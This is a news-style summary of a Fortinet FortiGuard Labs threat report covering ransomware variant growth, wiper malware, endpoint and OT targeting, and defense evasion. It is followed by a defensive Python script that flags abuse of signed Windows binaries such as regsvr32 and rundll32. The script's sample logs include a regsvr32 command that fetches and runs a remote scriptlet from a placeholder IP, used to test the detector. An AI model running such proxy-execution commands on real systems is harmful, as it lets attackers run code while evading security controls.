FortiGuard Labs: Ransomware Variants Nearly Doubled in 6 Months

The most recent FortiGuard Labs Global Threat Landscape Report from Fortinet (NASDAQ: FTNT), a leading supplier of comprehensive, integrated, and automated cybersecurity solutions, reveals that FortiGuard Labs encountered a total of 10,666 ransomware variants in the last six months, compared with just 5,400 in the preceding six months. In just six months, the number of ransomware strains has increased by over 100 percent.

Because Ransomware-as-a-Service (RaaS) is so widely available on the dark web, criminals continue to profit from it, and businesses are left weighing whether to pay ransom settlements. Regardless of size or sector, firms need a proactive strategy to combat ransomware. Zero-trust network access (ZTNA), sophisticated endpoint detection and response (EDR), and real-time visibility, protection, and remediation are essential in preventing ransomware attacks.

To sum up, highlights of the latest FortiGuard Labs Global Threat Landscape report include:

  • The ransomware threat keeps evolving, with Ransomware-as-a-Service (RaaS) enabling additional variants.
  • Cyber attackers continue to target work-from-anywhere (WFA) endpoints in order to penetrate business networks. Given the expanding attack surface and the convergence of operational technology (OT) and information technology (IT), both OT and IT environments are appealing targets for attackers.
  • The proliferation of wiper malware as a component of adversary toolkits shows that destructive threat trends are still evolving.
  • To increase the precision and destructive effect of attacks along the cyber-attack chain, adversaries are adding reconnaissance and defense-evasion techniques.

“Cyber adversaries are advancing their playbooks to thwart defense and scale their criminal affiliate networks,” said Derek Manky, Chief Security Strategist & VP Global Threat Intelligence, FortiGuard Labs. “They are using aggressive execution strategies such as extortion or wiping data as well as focusing on reconnaissance tactics pre-attack to ensure better return on threat investment. To combat advanced and sophisticated attacks, organizations need integrated security solutions that can ingest real-time threat intelligence, detect threat patterns, and correlate massive amounts of data to detect anomalies and automatically initiate a coordinated response across hybrid networks.”

OT and Endpoint Still Irresistible Targets

Ransomware remains a major concern as cyber adversaries continue to devote substantial resources to developing new attack methods. FortiGuard Labs encountered a total of 10,666 ransomware variants in the last six months, compared with just 5,400 in the preceding six months, an increase of over 100% in just six months. Because RaaS is so widely available on the dark web, criminals continue to profit from it, and businesses are left weighing whether to pay ransom settlements. Regardless of size or sector, firms need a proactive strategy to combat ransomware. Zero-trust network access (ZTNA), sophisticated endpoint detection and response (EDR), and real-time visibility, protection, and remediation are essential.

As attackers continue to target the expanding attack surface, the digital convergence of IT and OT and the endpoints supporting WFA remain important attack vectors. Endpoint vulnerability exploits typically give an unauthorized party initial access to a system, with the intention of moving laterally into corporate networks. Examples include a remote code execution (RCE) vulnerability (CVE-2022-26937) and a high-volume spoofing vulnerability (CVE-2022-26925). Examining endpoint vulnerabilities by volume and by detections also reveals the persistent path cyber attackers take in their attempts to gain access by exploiting both old and new vulnerabilities.

OT was not exempt either when examining vulnerability trends. Numerous devices and platforms were subjected to in-the-wild attacks, illustrating the cybersecurity reality of greater IT and OT convergence as well as the disruptive objectives of attackers. Advanced endpoint technologies can help contain and remediate affected devices at an early stage of an attack. In addition, services such as a digital risk protection service (DRPS) can be used to assess external attack surface risks, detect and fix security flaws, and provide contextual insight into present and emerging threats.

Wipers Widening

Wiper malware trends show a troubling progression toward more destructive and sophisticated attack methods, with data-erasing malware continuing to spread. The conflict in Ukraine encouraged threat actors to target critical infrastructure more often with disk-wiping malware, the use of which has since grown significantly.

In the first half of 2022, FortiGuard Labs discovered at least seven significant new wiper variants deployed in several campaigns against government, military, and commercial organizations. This figure is notable because it is close to the total number of wiper variants discovered since 2012. Nor did the wipers stay in a single region: they were found in 24 countries besides Ukraine. To reduce the impact of wiper attacks, network detection and response (NDR) with self-learning artificial intelligence (AI) helps identify intrusions sooner. Backups must also be kept offline and off-site.

Examining adversary strategies reveals how ransomware attack plans and tactics are developing. To identify the most common tactics over the last six months, FortiGuard Labs examined the functionality of the malware it discovered. Of the top eight endpoint-focused tactics and techniques, defense evasion was the tactic malware authors used most frequently, most often through system binary proxy execution.

Concealing malicious intent is one of an adversary's highest priorities. As a result, they attempt to disguise commands by having a trusted, validly signed process execute them, carrying out malicious actions while evading protections. Process injection, the second most widely used technique, involves attackers inserting code into another process's address space in an effort to bypass security controls and increase stealth. Equipped with this intelligence, organizations are better positioned to protect themselves against attackers' extensive toolkits. Protecting the edges of hybrid networks requires integrated, AI- and ML-driven cybersecurity solutions with superior detection and response capabilities, supported by actionable threat intelligence.
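A defender-side illustration of the system binary proxy execution technique described above, added here and not part of the Fortinet report: a small triage script that scores process-creation events when a signed, trusted Windows binary is launched with arguments or a parent process that are unusual for benign use. The proxy-binary list, scoring weights, and Sysmon-like key="value" log layout are assumptions chosen for the example, and the log lines are constructed.

```python
"""Triage process-creation events for system binary proxy execution (a
defense-evasion technique). Added example with constructed log lines."""
import re
# Signed Windows binaries commonly abused to proxy execution of other code
# (MITRE ATT&CK T1218). Illustrative subset, not an exhaustive list.
PROXY_BINARIES = {"rundll32.exe", "regsvr32.exe", "mshta.exe", "certutil.exe"}
# Argument patterns that are unusual for benign use of those binaries.
SUSPICIOUS_ARGS = [
    re.compile(r"https?://", re.I),                     # remote content
    re.compile(r"\\(Temp|AppData|Downloads)\\", re.I),  # user-writable path
    re.compile(r"/i:|scrobj\.dll|javascript:", re.I),   # scriptlet/script use
]
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}

def parse_event(line):
    """Parse a key="value" process-creation line into a dict."""
    return dict(re.findall(r'(\w+)="([^"]*)"', line))
def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def score_event(ev):
    """Return (score, reasons); a score of 2 or more merits analyst review."""
    image, parent = basename(ev.get("Image", "")), basename(ev.get("ParentImage", ""))
    if image not in PROXY_BINARIES:
        return 0, []
    score, reasons = 1, ["proxy binary: " + image]
    for pat in SUSPICIOUS_ARGS:
        if pat.search(ev.get("CommandLine", "")):
            score += 1
            reasons.append("suspicious argument matches " + pat.pattern)
    if parent in OFFICE_PARENTS:  # document-borne execution chain
        score += 2
        reasons.append("spawned by Office application: " + parent)
    return score, reasons

def triage(lines, threshold=2):
    """Return (image, score, reasons) for events scoring at or above threshold."""
    hits = []
    for ev in map(parse_event, lines):
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((ev.get("Image"), score, reasons))
    return hits

# Constructed sample events in a Sysmon-like key="value" layout.
SAMPLE_LOGS = [
    'Image="C:\\Windows\\System32\\rundll32.exe" ParentImage="C:\\Program Files\\Microsoft Office\\WINWORD.EXE" CommandLine="rundll32.exe C:\\Users\\u\\AppData\\Local\\Temp\\x.dll,Run"',
    'Image="C:\\Windows\\System32\\regsvr32.exe" ParentImage="C:\\Windows\\explorer.exe" CommandLine="regsvr32.exe /s /i:http://198.51.100.7/a.sct scrobj.dll"',
    'Image="C:\\Windows\\System32\\rundll32.exe" ParentImage="C:\\Windows\\System32\\svchost.exe" CommandLine="rundll32.exe shell32.dll,Control_RunDLL"',
]
```

Running `triage(SAMPLE_LOGS)` flags the first two events (scores 4 and 3) and leaves the benign Control Panel launch of rundll32 below the threshold, which is the point of scoring on context rather than on the binary name alone.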

AI-powered Security

Actionable threat intelligence gives organizations a better grasp of their adversaries' objectives and strategies, so they can coordinate their defenses to adapt and respond proactively to rapidly changing attack methods. Threat insights are also essential for prioritizing patching efforts and creating more secure configurations.

Cybersecurity awareness and training are also crucial to keep staff and security teams informed as the threat landscape develops. To keep up with the volume, sophistication, and speed of today's cyber threats, organizations require security operations that can run at machine speed. AI- and ML-powered prevention, detection, and response strategies built on a cybersecurity mesh architecture allow much closer integration, greater automation, and a faster, more coordinated, and more efficient response to attacks across the extended network.

Report Overview

This most recent Global Threat Landscape Report is a snapshot of FortiGuard Labs’ collective intelligence, taken from Fortinet’s extensive sensor network, which collected billions of threat events detected globally during the first half of 2022.

Much as the MITRE ATT&CK framework classifies adversary tactics and techniques, with the first three groupings spanning reconnaissance, resource development, and initial access, the FortiGuard Labs Global Threat Landscape Report uses this model to describe how threat actors target vulnerabilities, build malicious infrastructure, and exploit their targets. The report also discusses threat trends affecting IT and OT from a global and regional viewpoint.